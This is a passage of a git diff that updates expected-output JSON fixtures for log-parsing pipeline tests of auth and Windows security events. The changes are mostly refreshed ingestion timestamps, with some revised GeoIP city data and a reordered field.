"2021-12-09T13:45:36.404006300Z", + "ingested": "2021-12-14T14:55:29.808143065Z", "timezone": "+0000", "kind": "event" }, @@ -1119,7 +1119,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404010700Z", + "ingested": "2021-12-14T14:55:29.808143469Z", "timezone": "+0000", "kind": "event" }, @@ -1154,7 +1154,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404035700Z", + "ingested": "2021-12-14T14:55:29.808143854Z", "timezone": "+0000", "kind": "event" }, @@ -1191,7 +1191,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404040500Z", + "ingested": "2021-12-14T14:55:29.808144244Z", "timezone": "+0000", "kind": "event" }, @@ -1228,7 +1228,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404045800Z", + "ingested": "2021-12-14T14:55:29.808144620Z", "timezone": "+0000", "kind": "event" }, @@ -1260,7 +1260,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404050100Z", + "ingested": "2021-12-14T14:55:29.808145126Z", "timezone": "+0000", "kind": "event" }, @@ -1293,7 +1293,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404059900Z", + "ingested": "2021-12-14T14:55:29.808145504Z", "timezone": "+0000", "kind": "event" }, @@ -1326,7 +1326,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404065100Z", + "ingested": "2021-12-14T14:55:29.808145891Z", "timezone": "+0000", "kind": "event" }, @@ -1363,7 +1363,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404070200Z", + "ingested": "2021-12-14T14:55:29.808146358Z", "timezone": "+0000", "kind": "event" }, @@ -1408,7 +1408,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404075200Z", + "ingested": "2021-12-14T14:55:29.808146736Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1450,7 +1450,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404102300Z", + "ingested": "2021-12-14T14:55:29.808147118Z", "timezone": "+0000", "kind": "event" }, @@ -1494,7 +1494,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404112700Z", + "ingested": "2021-12-14T14:55:29.808147502Z", "timezone": "+0000", "kind": "event" }, @@ -1529,7 +1529,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404118800Z", + "ingested": "2021-12-14T14:55:29.808147885Z", "timezone": "+0000", "kind": "event" }, @@ -1565,7 +1565,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404124800Z", + "ingested": "2021-12-14T14:55:29.808149125Z", "timezone": "+0000", "kind": "event" }, @@ -1595,7 +1595,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404130700Z", + "ingested": "2021-12-14T14:55:29.808149530Z", "timezone": "+0000", "kind": "event" }, @@ -1625,7 +1625,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404136500Z", + "ingested": "2021-12-14T14:55:29.808149915Z", "timezone": "+0000", "kind": "event" }, @@ -1658,7 +1658,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404142500Z", + "ingested": "2021-12-14T14:55:29.808150298Z", "timezone": "+0000", "kind": "event" }, @@ -1695,7 +1695,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404148400Z", + "ingested": "2021-12-14T14:55:29.808150683Z", "timezone": "+0000", "kind": "event" }, @@ -1740,7 +1740,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404154500Z", + "ingested": "2021-12-14T14:55:29.808151081Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1782,7 +1782,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404159300Z", + "ingested": "2021-12-14T14:55:29.808151480Z", "timezone": "+0000", "kind": "event" }, @@ -1831,7 +1831,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404164100Z", + "ingested": "2021-12-14T14:55:29.808151862Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1873,7 +1873,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404169700Z", + "ingested": "2021-12-14T14:55:29.808152394Z", "timezone": "+0000", "kind": "event" }, @@ -1917,7 +1917,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404173300Z", + "ingested": "2021-12-14T14:55:29.808152785Z", "timezone": "+0000", "kind": "event" }, @@ -1952,7 +1952,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404178Z", + "ingested": "2021-12-14T14:55:29.808153166Z", "timezone": "+0000", "kind": "event" }, @@ -1986,7 +1986,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404182900Z", + "ingested": "2021-12-14T14:55:29.808153554Z", "category": [ "iam" ], @@ -2021,7 +2021,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404186800Z", + "ingested": "2021-12-14T14:55:29.808153950Z", "category": [ "iam" ], @@ -2056,7 +2056,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404191300Z", + "ingested": "2021-12-14T14:55:29.808154335Z", "category": [ "iam" ], @@ -2102,7 +2102,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404195700Z", + "ingested": "2021-12-14T14:55:29.808154744Z", "category": [ "iam" ], @@ -2143,7 +2143,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404201100Z", + "ingested": "2021-12-14T14:55:29.808155130Z", "timezone": "+0000", "kind": "event" }, @@ -2170,7 +2170,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404206200Z", + "ingested": "2021-12-14T14:55:29.808155513Z", "timezone": "+0000", "kind": "event" }, @@ -2197,7 +2197,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404211400Z", + "ingested": "2021-12-14T14:55:29.808155888Z", "timezone": "+0000", "kind": "event" }, @@ -2224,7 +2224,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404216200Z", + "ingested": "2021-12-14T14:55:29.808156268Z", "timezone": "+0000", "kind": "event" }, @@ -2255,7 +2255,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404220700Z", + "ingested": "2021-12-14T14:55:29.808156641Z", "timezone": "+0000", "kind": "event" }, @@ -2288,7 +2288,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404225Z", + "ingested": "2021-12-14T14:55:29.808157019Z", "timezone": "+0000", "kind": "event" }, @@ -2325,7 +2325,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404228700Z", + "ingested": "2021-12-14T14:55:29.808157416Z", "timezone": "+0000", "kind": "event" }, @@ -2360,7 +2360,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404233300Z", + "ingested": "2021-12-14T14:55:29.808157794Z", "timezone": "+0000", "kind": "event" }, @@ -2396,7 +2396,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404237900Z", + "ingested": "2021-12-14T14:55:29.808158196Z", "timezone": "+0000", "kind": "event" }, @@ -2437,7 +2437,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404242500Z", + "ingested": "2021-12-14T14:55:29.808158585Z", "timezone": "+0000", "kind": "event" }, @@ -2468,7 +2468,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404246700Z", + "ingested": "2021-12-14T14:55:29.808158973Z", "timezone": "+0000", "kind": "event" }, @@ -2505,7 +2505,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404251900Z", + "ingested": "2021-12-14T14:55:29.808159357Z", "timezone": "+0000", "kind": "event" }, @@ -2540,7 +2540,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404257700Z", + "ingested": "2021-12-14T14:55:29.808159741Z", "timezone": "+0000", "kind": "event" }, @@ -2576,7 +2576,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404262200Z", + "ingested": "2021-12-14T14:55:29.808160120Z", "timezone": "+0000", "kind": "event" }, @@ -2617,7 +2617,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404267Z", + "ingested": "2021-12-14T14:55:29.808160508Z", "timezone": "+0000", "kind": "event" }, @@ -2648,7 +2648,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404272400Z", + "ingested": "2021-12-14T14:55:29.808160891Z", "timezone": "+0000", "kind": "event" }, @@ -2685,7 +2685,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404277300Z", + "ingested": "2021-12-14T14:55:29.808161275Z", "timezone": "+0000", "kind": "event" }, @@ -2720,7 +2720,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404283800Z", + "ingested": "2021-12-14T14:55:29.808161787Z", "timezone": "+0000", "kind": "event" }, @@ -2756,7 +2756,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404289800Z", + "ingested": "2021-12-14T14:55:29.808162177Z", "timezone": "+0000", "kind": "event" }, @@ -2789,7 +2789,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404295600Z", + "ingested": "2021-12-14T14:55:29.808162573Z", "timezone": "+0000", "kind": "event" }, @@ -2826,7 +2826,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404301500Z", + "ingested": "2021-12-14T14:55:29.808162964Z", "timezone": "+0000", "kind": "event" }, @@ -2859,7 +2859,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404307Z", + "ingested": "2021-12-14T14:55:29.808163346Z", "timezone": "+0000", "kind": "event" }, @@ -2891,7 +2891,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404310600Z", + "ingested": "2021-12-14T14:55:29.808163736Z", "timezone": "+0000", "kind": "event" }, @@ -2921,7 +2921,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404315Z", + "ingested": "2021-12-14T14:55:29.808164114Z", "timezone": "+0000", "kind": "event" }, @@ -2951,7 +2951,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404320100Z", + "ingested": "2021-12-14T14:55:29.808164507Z", "timezone": "+0000", "kind": "event" }, @@ -2996,7 +2996,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404324900Z", + "ingested": "2021-12-14T14:55:29.808164891Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -3038,7 +3038,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404329900Z", + "ingested": "2021-12-14T14:55:29.808165276Z", "timezone": "+0000", "kind": "event" }, @@ -3072,7 +3072,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404335900Z", + "ingested": "2021-12-14T14:55:29.808165677Z", "timezone": "+0000", "kind": "event" }, @@ -3102,7 +3102,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404362900Z", + "ingested": "2021-12-14T14:55:29.808166059Z", "timezone": "+0000", "kind": "event" }, @@ -3135,7 +3135,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404369500Z", + "ingested": "2021-12-14T14:55:29.808166445Z", "timezone": "+0000", "kind": "event" }, @@ -3168,7 +3168,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404374Z", + "ingested": "2021-12-14T14:55:29.808166824Z", "timezone": "+0000", "kind": "event" }, @@ -3205,7 +3205,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404378800Z", + "ingested": "2021-12-14T14:55:29.808167212Z", "timezone": "+0000", "kind": "event" }, @@ -3238,7 +3238,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404382500Z", + "ingested": "2021-12-14T14:55:29.808167599Z", "timezone": "+0000", "kind": "event" }, @@ -3275,7 +3275,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404386800Z", + "ingested": "2021-12-14T14:55:29.808167978Z", "timezone": "+0000", "kind": "event" }, @@ -3320,7 +3320,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404391400Z", + "ingested": "2021-12-14T14:55:29.808168374Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -3362,7 +3362,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404396600Z", + "ingested": "2021-12-14T14:55:29.808168759Z", "timezone": "+0000", "kind": "event" }, @@ -3406,7 +3406,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404401800Z", + "ingested": "2021-12-14T14:55:29.808169134Z", "timezone": "+0000", "kind": "event" }, @@ -3441,7 +3441,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404405700Z", + "ingested": "2021-12-14T14:55:29.808169518Z", "timezone": "+0000", "kind": "event" }, @@ -3477,7 +3477,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404410400Z", + "ingested": "2021-12-14T14:55:29.808169903Z", "timezone": "+0000", "kind": "event" }, @@ -3517,7 +3517,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404416300Z", + "ingested": "2021-12-14T14:55:29.808170284Z", "timezone": "+0000", "kind": "event" }, @@ -3552,7 +3552,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404421600Z", + "ingested": "2021-12-14T14:55:29.808170672Z", "timezone": "+0000", "kind": "event" }, @@ -3588,7 +3588,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404426400Z", + "ingested": "2021-12-14T14:55:29.808171072Z", "timezone": "+0000", "kind": "event" }, @@ -3628,7 +3628,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404432200Z", + "ingested": "2021-12-14T14:55:29.808171520Z", "timezone": "+0000", "kind": "event" }, @@ -3663,7 +3663,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404438Z", + "ingested": "2021-12-14T14:55:29.808171909Z", "timezone": "+0000", "kind": "event" }, @@ -3699,7 +3699,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404443900Z", + "ingested": "2021-12-14T14:55:29.808172296Z", "timezone": "+0000", "kind": "event" }, @@ -3739,7 +3739,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404449700Z", + "ingested": "2021-12-14T14:55:29.808172680Z", "timezone": "+0000", "kind": "event" }, @@ -3774,7 +3774,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404455500Z", + "ingested": "2021-12-14T14:55:29.808173067Z", "timezone": "+0000", "kind": "event" }, @@ -3810,7 +3810,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404459800Z", + "ingested": "2021-12-14T14:55:29.808173510Z", "timezone": "+0000", "kind": "event" }, @@ -3850,7 +3850,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404464700Z", + "ingested": "2021-12-14T14:55:29.808173892Z", "timezone": "+0000", "kind": "event" }, @@ -3885,7 +3885,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404469400Z", + "ingested": "2021-12-14T14:55:29.808174267Z", "timezone": "+0000", "kind": "event" }, @@ -3919,7 +3919,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404473600Z", + "ingested": "2021-12-14T14:55:29.808174658Z", "category": [ "iam" ], @@ -3954,7 +3954,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404478200Z", + "ingested": "2021-12-14T14:55:29.808175047Z", "category": [ "iam" ], @@ -3989,7 +3989,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404482500Z", + "ingested": "2021-12-14T14:55:29.808175433Z", "category": [ "iam" ], @@ -4035,7 +4035,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404486400Z", + "ingested": "2021-12-14T14:55:29.808175954Z", "category": [ "iam" ], @@ -4076,7 +4076,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404491100Z", + "ingested": "2021-12-14T14:55:29.808176336Z", "timezone": "+0000", "kind": "event" }, @@ -4103,7 +4103,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404497700Z", + "ingested": "2021-12-14T14:55:29.808176717Z", "timezone": "+0000", "kind": "event" }, @@ -4132,7 +4132,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404501200Z", + "ingested": "2021-12-14T14:55:29.808177107Z", "timezone": "+0000", "kind": "event" }, @@ -4172,7 +4172,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404506100Z", + "ingested": "2021-12-14T14:55:29.808177480Z", "timezone": "+0000", "kind": "event" }, @@ -4207,7 +4207,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404511Z", + "ingested": "2021-12-14T14:55:29.808178199Z", "timezone": "+0000", "kind": "event" }, @@ -4243,7 +4243,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404516100Z", + "ingested": "2021-12-14T14:55:29.808178601Z", "timezone": "+0000", "kind": "event" }, @@ -4283,7 +4283,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404521200Z", + "ingested": "2021-12-14T14:55:29.808178981Z", "timezone": "+0000", "kind": "event" }, @@ -4318,7 +4318,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404525100Z", + "ingested": "2021-12-14T14:55:29.808179358Z", "timezone": "+0000", "kind": "event" }, @@ -4354,7 +4354,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404530200Z", + "ingested": "2021-12-14T14:55:29.808179757Z", "timezone": "+0000", "kind": "event" }, @@ -4399,7 +4399,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404534500Z", + "ingested": "2021-12-14T14:55:29.808180140Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -4441,7 +4441,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404539300Z", + "ingested": "2021-12-14T14:55:29.808180525Z", "timezone": "+0000", "kind": "event" }, diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json index 97c714057b9..e3b8dab728c 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json @@ -37,7 +37,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:42.694570800Z", + "ingested": "2021-12-14T14:55:36.054843721Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -91,7 +91,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-12-09T13:45:42.694579100Z", + "ingested": "2021-12-14T14:55:36.054846137Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -143,7 +143,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:42.694584600Z", + "ingested": "2021-12-14T14:55:36.054846562Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -194,14 +194,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -214,7 +214,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:45:42.694589900Z", + "ingested": "2021-12-14T14:55:36.054846972Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -262,7 +262,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:42.694595300Z", + "ingested": "2021-12-14T14:55:36.054847329Z", "timezone": "+0000", "kind": "event" }, @@ -303,14 +303,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -322,7 +322,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:45:42.694600700Z", + "ingested": "2021-12-14T14:55:36.054847688Z", "timezone": "+0000", "kind": "event" } @@ -358,7 +358,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:42.694605900Z", + "ingested": "2021-12-14T14:55:36.054848053Z", "timezone": "+0000", "kind": "event" }, @@ -401,7 +401,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:42.694611200Z", + "ingested": "2021-12-14T14:55:36.054848406Z", "timezone": "+0000", "kind": "event" }, @@ -433,7 +433,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:42.694616600Z", + "ingested": "2021-12-14T14:55:36.054848751Z", "category": [ "iam" ], @@ -479,7 +479,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:42.694621900Z", + "ingested": "2021-12-14T14:55:36.054849097Z", "category": [ "iam" ], diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json index 2cd21b406b8..39153453ec4 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json @@ -34,14 +34,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -54,7 +54,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:45:43.392072100Z", + "ingested": "2021-12-14T14:55:36.752110710Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -95,7 +95,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392079Z", + "ingested": "2021-12-14T14:55:36.752190528Z", "timezone": "+0000", "kind": "event" }, @@ -125,7 +125,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392082800Z", + "ingested": "2021-12-14T14:55:36.752190973Z", "timezone": "+0000", "kind": "event" }, @@ -152,7 +152,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392087500Z", + "ingested": "2021-12-14T14:55:36.752191316Z", "timezone": "+0000", "kind": "event" }, @@ -179,7 +179,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392091200Z", + "ingested": "2021-12-14T14:55:36.752214504Z", "timezone": "+0000", "kind": "event" }, @@ -206,7 +206,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392095700Z", + "ingested": "2021-12-14T14:55:36.752214943Z", "timezone": "+0000", "kind": "event" }, @@ -243,7 +243,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392101200Z", + "ingested": "2021-12-14T14:55:36.752215290Z", "timezone": "+0000", "kind": "event" }, diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json index 024b2254770..b7805e870c5 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json @@ -24,7 +24,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:43.747682Z", + "ingested": "2021-12-14T14:55:37.123383287Z", "timezone": "+0000", "kind": "event" }, @@ -57,7 +57,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:43.747690700Z", + "ingested": "2021-12-14T14:55:37.123385539Z", "timezone": "+0000", "kind": "event" }, diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json index f5f8681e353..a3551f1f53d 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json @@ -43,7 +43,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:43.972797500Z", + "ingested": "2021-12-14T14:55:37.404875412Z", "code": "1100", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json index dd880a80804..eaef4bee0f6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json @@ -58,7 +58,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:44.108025700Z", + "ingested": "2021-12-14T14:55:37.526510977Z", "code": "1102", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json index 209697bd443..6e53c341318 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json @@ -43,7 +43,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:44.290473500Z", + "ingested": "2021-12-14T14:55:37.704135348Z", "code": "1104", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json index 229ed6b96ef..7b2fa535847 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json @@ -48,7 +48,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:44.408439300Z", + "ingested": "2021-12-14T14:55:37.821126911Z", "code": "1105", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json index 0a2df7e9eae..29221a9d4ec 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json @@ -74,7 +74,7 @@ "name": "DC01.contoso.local" }, "event": { - "ingested": "2021-12-09T13:45:44.539859Z", + "ingested": "2021-12-14T14:55:37.953547417Z", "code": "4663", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json index 9c85d035dd3..5323eea3b2a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json @@ -13,6 +13,7 @@ "pid": 764, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2020-07-28T13:22:18.799Z", "winlog": { "computer_name": "WIN-BVM4LI1L1Q6.TEST.local", "process": { @@ -54,13 +55,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4670_WindowsSrv2016.xml" - } - }, - "@timestamp": "2020-07-28T13:22:18.799Z", "ecs": { "version": "1.12.0" }, @@ -69,11 +63,17 @@ "WIN-BVM4LI1L1Q6$" ] }, + "log": { + "level": "information", + "file": { + "path": 